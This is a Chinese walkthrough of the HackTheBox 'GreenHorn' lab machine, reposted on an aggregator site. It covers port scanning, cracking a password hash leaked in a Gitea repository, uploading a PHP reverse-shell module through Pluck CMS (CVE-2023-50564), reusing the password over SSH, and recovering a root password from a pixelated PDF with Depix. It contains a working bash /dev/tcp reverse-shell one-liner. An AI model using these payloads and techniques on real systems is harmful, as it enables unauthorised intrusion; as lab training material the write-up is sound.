HTB-GreenHorn 靶机笔记

news2024/12/25 1:10:52

GreenHorn 靶机笔记

概述

GreenHorn 是 HTB 上的一个 linux easy 难度的靶机,主要是通过信息搜集和代码审计找到对我们有用的信息。其中还包含了对pdf文件的修复技术

靶机地址:https://app.hackthebox.com/machines/GreenHorn

一丶 nmap 扫描

1)端口扫描

-sT 以 TCP 全连接扫描,–min-rate 10000 以最低 10000 速率进行扫描,-p-进行全端口扫描,-o ports 结果输出到 ports 文件中

nmap -sT --min-rate 10000 -p- 10.10.11.25 -o ports

Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-17 03:55 EDT
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 32.56% done; ETC: 03:55 (0:00:27 remaining)
Warning: 10.10.11.25 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.25
Host is up (0.26s latency).
Not shown: 33635 closed tcp ports (conn-refused), 31897 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp

Nmap done: 1 IP address (1 host up) scanned in 147.73 seconds
2)详细信息扫描

以-sT 以 tcp, -sV 探测版本, -sC 以默认脚本 扫描端口 $ports,-O 探测操作系统版本,输出到 details 文件中

nmap -sT -sV -sC -p22,80,3000 10.10.11.25 -o details 

Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-17 04:04 EDT                                                                    
Nmap scan report for 10.10.11.25             
Host is up (0.43s latency).                                     
PORT     STATE SERVICE VERSION               
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)                 
| ssh-hostkey:
|   256 57d6928a7244841729eb5cc9636afefd (ECDSA)           
|_  256 40ea17b1b6c53f4256674a3cee75232f (ED25519)        
80/tcp   open  http    nginx 1.18.0 (Ubuntu)               
|_http-server-header: nginx/1.18.0 (Ubuntu)           
|_http-title: Did not follow redirect to http://greenhorn.htb/                 
3000/tcp open  ppp?             
| fingerprint-strings:                 
|   GenericLines, Help, RTSPRequest:     
|     HTTP/1.1 400 Bad Request            
|     Content-Type: text/plain; charset=utf-8        
|     Connection: close                            
|     Request                
|   GetRequest:                          
|     HTTP/1.0 200 OK                                   
|     Cache-Control: max-age=0, private, must-revalidate, no-transform       
|     Content-Type: text/html; charset=utf-8           
|     Set-Cookie: i_like_gitea=ee70815cf933490f; Path=/; HttpOnly; SameSite=Lax          
|     Set-Cookie: _csrf=cxvY7yNHIOWsTQ38C0zH-zadPw46MTcyMzg4MTg4ODM0MTc3MjUyOA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax      
|     X-Frame-Options: SAMEORIGIN                   
|     Date: Sat, 17 Aug 2024 08:04:48 GMT                               
|     <!DOCTYPE html>
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 171.28 seconds
3)默认漏洞脚本扫描
nmap --script=vuln 10.10.11.25 -o vuln     

Nmap scan report for 10.10.11.25
Host is up (1.8s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3000/tcp open  ppp
8000/tcp open  http-alt

详细信息扫描看到 http-title: Did not follow redirect to http://greenhorn.htb/ 要去 /etc/hosts 文件绑定域名和 ip

10.10.11.25     greenhorn.htb

image-20240817161543747

写进去就可以访问 web 页面了

二、web 渗透

1)80 端口

访问

http://greenhorn.htb
image-20240817162117378

看到是一个 pluck 的 cms,admin 也是可以点击的。点击进去

image-20240817162226884

需要密码,也给出了 pluck 的版本是 4.7.18

google 搜索大法找到:Pluck 安全漏洞(CVE-2023-50564)

好了,我们现在知道等了进去就可以利用文件上传反弹 shell 了 但我们要怎么登陆呢,没有密码啊

2)3000 端口
image-20240817163107217

我们可以注册,登陆进去看看

image-20240817163305038

发现网站源码,看看有没有什么密码的信息,我们要进入 pluck 的后台才有机会获得立足点

通过审计

login.php 看到校验

image-20240817164538094

image-20240817164901133

在 pass.php 中发现 ww 变量

刚才也看到了他是 sha512 hash 算法加密的,我们复制出来用 hashcat 破解

  • -a 设定密码破解模式
  • -m 设定加密类型
hashcat -a 0 -m 1700 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163' /usr/share/wordlists/rockyou.txt 
d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163:iloveyou1

看到密码

iloveyou1

登陆 80 端口的后台服务

image-20240817170341065

三、获得立足点

在 options 里我们选择 mange modules 里的 install a module

image-20240817170200025

我们需要去找一个 php 的 zip 压缩包

准备一句话木马

<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.21/4444 0>&1' "); ?>
zip rev.zip rev.php 

上传

image-20240922132444988

本地监听端口

sudo rlwrap nc -lvp 4444

image-20240922132951179

看到成功获得立足点

四、提权到 root

我们获得了 www-data 的权限,去机器的家目录下看看有哪些用户

www-data@greenhorn:/home$ ls
git
junior

看到 gitjunior 用户,现用之前获得的密码 iloveyou1 碰撞一下这两个用户的 ssh

image-20240922135320803

成功拿到 junior 的 shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
junior@greenhorn:/var/www/html/pluck$

image-20240922135706740

看到 Using OpenVAS.pdf 文件

开启一个 python 的 http 协议

junior@greenhorn:~$ python3 -m http.server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

kali 中执行

wget http://greenhorn.htb:8000/'Using OpenVAS.pdf' 

image-20240922140134183

下载成功,重命名

mv 'Using OpenVAS.pdf' greenhorn.pdf

打开 pdf,看到密码被打上了马赛克,分析内容,这个密码应该就是提取 root 的关键

sudo apt-get install poppler-utils
pdfimages greenhorn.pdf ./root

用到 depix: https://github.com/spipm/Depix 修复像素

python depix.py -p ../root-000.ppm -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png -o ../root_pass.png

image-20240922142609310

可以看到密码

sudo ssh root@greenhorn.htb

成功获得root权限

image-20240922143523935

总结

  • 通过nmap扫描发现目标开启了22,80,3000端口,在3000端口的版本控制平台注册账户,看到了目标系统的源码,从而拿到了80端口http服务的凭证
  • 通过利用Pluck 安全漏洞(CVE-2023-50564)成功拿到www-data的shell。
  • 利用相同的口令凭证获得了用户junior的权限,在家目录下看到了一个pdf文件,进行像素修复,拿到了root权限

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2157456.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Spring Boot 学习之路 -- 基础认知

前言 最近因为业务需要&#xff0c;被拉去研究后端的项目&#xff0c;代码基于 Spring Boot&#xff0c;对我来说完全小白&#xff0c;需要重新学习研究…出于个人习惯&#xff0c;会以 Blog 文章的方式做一些记录&#xff0c;文章内容基本来源于「 Spring Boot 从入门到精通&…

Mac系统Docker中SQLserver数据库文件恢复记录

Mac系统Docker中SQLserver数据库文件恢复记录 Mac想要安装SQLsever&#xff0c;通过docker去拉去镜像是最简单方法。 一、下载Docker Docker 下载安装&#xff1a; 需要‘科学上网’ 才能访问到docker官网。&#xff08; https://docs.docker.com/desktop/install/mac-ins…

短剧APP分销小视频联盟收益源码带版权激励视频无需自己上传短剧

功能介绍&#xff1a; 带2000多部短剧资源&#xff0c;有版权&#xff0c;无需自己更新短剧&#xff0c; 已对接广告联盟&#xff0c;解锁短剧观看激励视频&#xff0c;对接各大广告平台 带刷小视频功能&#xff0c;插入视频广告&#xff0c;获取广告收益&#xff0c; 带任…

Stable Diffusion绘画 | ControlNet应用-instant-ID控制器:快速生成人物多角度图片

使用 instant-ID 控制器&#xff0c;用户只需要提供一张正脸图片&#xff0c;就可以快速地给人物生成多角度图片的&#xff0c;从而很好的保持了人物的一致性。 对于要制作小说推文、创建人物故事情节的创作&#xff0c;是一个非常好用且高效的功能。 准备工作 使用该控制类型&…

什么是端到端(end to end)大模型,它和传统的大模型有什么区别?其优势与劣势是什么?

“ 端到端模型&#xff0c;是一个直接由输入获取输出的过程 ” 最近有一个很火的关于人工智能模型的词——端到端模型。 那么什么是端到端模型&#xff1f;为什么会提出端到端模型&#xff0c;以及它解决了哪些问题&#xff1f; 今天我们就来一起了解一下这个端到端模型。 …

如何使用ChatGPT撰写文献综述?7个步骤轻松搞定

大家好,感谢关注。我是七哥,一个在高校里不务正业,折腾学术科研AI实操的学术人。关于使用ChatGPT等AI学术科研的相关问题可以和作者七哥(yida985)交流,多多交流,相互成就,共同进步,为大家带来最酷最有效的智能AI学术科研写作攻略。 撰写文献综述对于研究人员和学生来说…

ssm汉服文化平台网站

专业团队&#xff0c;咨询就送开题报告&#xff0c;欢迎大家咨询&#xff0c;联系方式在文章底部 摘 要 本论文主要论述了如何使用JAVA语言开发一个汉服文化平台网站 &#xff0c;本系统将严格按照软件开发流程进行各个阶段的工作&#xff0c;采用B/S架构&#xff0c;面向对象…

【题解】—— LeetCode一周小结38

&#x1f31f;欢迎来到 我的博客 —— 探索技术的无限可能&#xff01; &#x1f31f;博客的简介&#xff08;文章目录&#xff09; 【题解】—— 每日一道题目栏 上接&#xff1a;【题解】—— LeetCode一周小结37 16.公交站间的距离 题目链接&#xff1a;1184. 公交站间的距…

【Linux】入门【更详细,带实操】

Linux全套讲解系列&#xff0c;参考视频-B站韩顺平&#xff0c;本文的讲解更为详细 目录 1、课程内容 2、应用领域 3、概述 4、 Linux和Unix 5、VMware15.5和CentOS7.6安装 6、网络连接三种方式 7、虚拟机克隆 8、虚拟机快照 9、虚拟机迁移删除 10、vmtools 11、目录…

抱歉占用公共资源,大家别猜啦,我们在一起了@Yaker

家人们上午好呀 这里是超绝脱单牛一枚 没错&#xff0c;我和Yaker有一个孩子&#xff08;bushi 今天我们的孩子YakLang来给大家介绍介绍&#xff0c;ta对块作用域的处理方式 在编程中&#xff0c;作用域&#xff08;Scope&#xff09;指的是变量、函数和对象的可访问性和生命…

文件查找和打包压缩【1.7】

文件查找和打包压缩【1.7】 八、文件查找和打包压缩8.1 文件查找8.1.1 locate8.1.2 findfind8.1.2.1 指定搜索目录层级8.1.2.2 先处理文件再处理目录8.1.2.3 根据文件名和inode查找8.1.2.4 根据属主属组查找8.1.2.5 根据文件类型查找8.1.2.6 空文件或目录8.1.2.7 组合条件8.1.2…

Vue项目之Element-UI(Breadcrumb)动态面包屑效果 el-breadcrumb

效果预览 需要导航的页面Vue.js 最笨的方法就是在每个需要面包屑的页面中固定写好 <template><div class="example-container"><el-breadcrumb separator="/"

不再错过任何一个区块!用Node.js + WebSocket轻松实现区块链实时监控

文章目录 前言一、WebSocket是什么&#xff1f;二、项目结构三、代码实现1. 后端实现2. 前端实现 四、启动项目总结 前言 随着区块链技术的发展&#xff0c;实时监控区块链网络中的区块和交易信息变得越来越重要。无论是开发去中心化应用&#xff08;DApp&#xff09;&#xf…

【WebGIS实例】(17)下载瓦片底图并实现离线加载——以天地图为例

前言 在有些项目中&#xff0c;会有部署到无法访问互联网的内网环境中&#xff0c;这时候就会有离线部署应用和地图服务等需求了。 本博客是本着交流学习的目的&#xff0c;分享一个离线瓦片地图的获取方案&#xff0c;以天地图为案例&#xff0c;实现步骤&#xff1a; 安装…

读书笔记——DDIA-v2 设计数据密集型应用(第二版)

ddia-v2中文版地址&#xff1a;https://github.com/Vonng/ddia/tree/v2 ddia-v2看完感觉爱不释手&#xff0c;只要是数据相关的知识都娓娓道来&#xff0c;为什么会这样&#xff1f;现在是怎样的&#xff1f;这样有什么问题&#xff1f;其中的看法和想法实在精辟、干练&#xf…

典型的MVC设计模式:使用JSP和JavaBean相结合的方式来动态生成网页内容典型的MVC设计模式

先看代码与实现&#xff1a; 文件结构 triangle_area4.jsp <% page contentType"text/html;charsetUTF-8" pageEncoding"UTF-8" %> <html> <body> <%--<jsp:useBean>&#xff1a;用于在JSP中实例化JavaBean。在这里&#xff0c…

感知笔记1:ROS 视觉- 跟随红球

- 目录 - 如何在 ROS 中可视化 RGB 相机。如何作为机器人切换主题。如何创建 blob 检测器。如何获取要跟踪的颜色的颜色编码。如何使用 blob 检测数据并移动 RGB 相机以跟踪 blob。 机器人技术中最常见的传感器是不起眼的 RGB 摄像头。它用于从基本颜色跟踪&#xff08;blob 跟…

解决 TortoiseGitPlink Fatal Error:深入解析

解决 TortoiseGitPlink Fatal Error&#xff1a;深入解析 在 Windows 平台上&#xff0c;开发者使用 Git 和 TortoiseGit 进行版本控制时&#xff0c;有时会遇到 TortoiseGitPlink Fatal Error。该错误通常是在推送/拉取代码时&#xff0c;客户端未能提供正确的 SSH 密钥。 1…

Linux之实战命令06:locate应用实例(四十)

简介&#xff1a; CSDN博客专家、《Android系统多媒体进阶实战》一书作者 新书发布&#xff1a;《Android系统多媒体进阶实战》&#x1f680; 优质专栏&#xff1a; Audio工程师进阶系列【原创干货持续更新中……】&#x1f680; 优质专栏&#xff1a; 多媒体系统工程师系列【…

Maven-四、继承

Maven进阶 文章目录 Maven进阶前言继承设置继承依赖管理总结 前言 一个项目中的不同模块可能引用的是同一个依赖&#xff0c;在这种情况下&#xff0c;单独在某个模块内引用太麻烦&#xff0c;于是maven使用继承的思想&#xff0c;在父模块中配置依赖包&#xff0c;其他需要这…